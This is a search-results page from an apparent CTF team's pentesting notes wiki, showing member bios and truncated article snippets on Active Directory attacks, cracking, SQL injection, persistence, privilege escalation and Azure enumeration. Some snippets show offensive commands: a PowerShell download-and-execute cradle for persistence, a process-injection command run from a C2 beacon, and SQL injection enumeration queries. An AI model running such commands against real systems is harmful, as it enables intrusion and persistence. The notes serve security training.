Search Results
83 total results found
Pentesting Methodology & Notes
Articles & Writeups
About Us
https://app.hackthebox.com/public/teams/overview/5904
The Team
Articles
Azure AD (AAD)
Abusing Active Directory Certificate Services
Domain Trust Abuse
Windows Attacks and Enumerations
Web
Network Enumeration
Cracking
AD Enumeration & Exploitation
C2
Binary Exploitation
Pwn challenges cheatsheet
BobBuilder
Passion for Red Team/Pentesting and machine learning. Software Ing. HackTheBox: BobBuilder
OtterSec
I like otters... a lot ʕ •ᴥ•ʔ. Currently focusing on honing my AD skills and recently got into AV/EDR evasion. Find me on HackTheBox here and on VulnLab :)
serioton
I love cats, Active Directory and playing CTFs
Kerberos Attacks
Kerberoasting Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password. Vulnera...
Miscellaneous
User SID and RID In Active Directory, any group or user that Windows doesn't create has a RID of 1000 or greater. The last 8 bytes of the RID determine the user's group. RID : 0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000 SID : 0x01050000000000051500...
Cracking
Find hash type based on length Get example hashes that have a length of 80 $hashes=(.\hashcat64.exe --example-hashes | where {$_.split('HASH: ')[-1].length -like 80}) Get the crack type from example hashes with length 80 hashcat64.exe --example-hashes |Select-String...
SQL Injection
Database enumeration MySQL SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata; SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users...
Persistence
Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...
Recon
Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...
Windows Local Privilege Escalation
SeDebugPrivilege Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt. WinLogon PID: 3488 Adopt binary: adopt.exe PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\ado...
LueRader
Interested in everything to do with enterprise network security. Usually a big fan of web and pwn too, but not very active lately.
pr0m0ly
Passionate about cybersecurity, specializing in Active Directory environments. CTF Player focused on Web, Forensics and Blockchain. You'll find me on platforms like HackTheBox and VulnLab!
Defense Evasion
Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...
Server Side Request Forgery SSRF
Definition Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to manipulate a server into making requests to internal or external resources, potentially gaining access to data and systems not directly reachable by the attacker. Bypass ...
Nmap cheatsheet with explanations
Always apply the best nmap scanning strategy for networks of all sizes Scan Network Range nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5 nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5 nmap -sn -oA tnet 10.129.2.18 10.129.2.19 10.129.2.20...
fsharp
Hey there! I'm interested in cybersecurity and I play CTFs as a hobby. My biggest interests are in reverse engineering and forensics. You can find me on CTF Discord servers (fsharp123), GitHub (G-flat), and Twitter (currently known as X; fsharp123). Personal a...
Useful links
dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...
Overview of Azure & M365
AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant, which represents a company (like a domain ...
Enumerate Users and Domains
MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...
Post-exploitation Reconnaissance
Enumerate AD tenant information and admin roles, and identify high-value targets in the network: ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...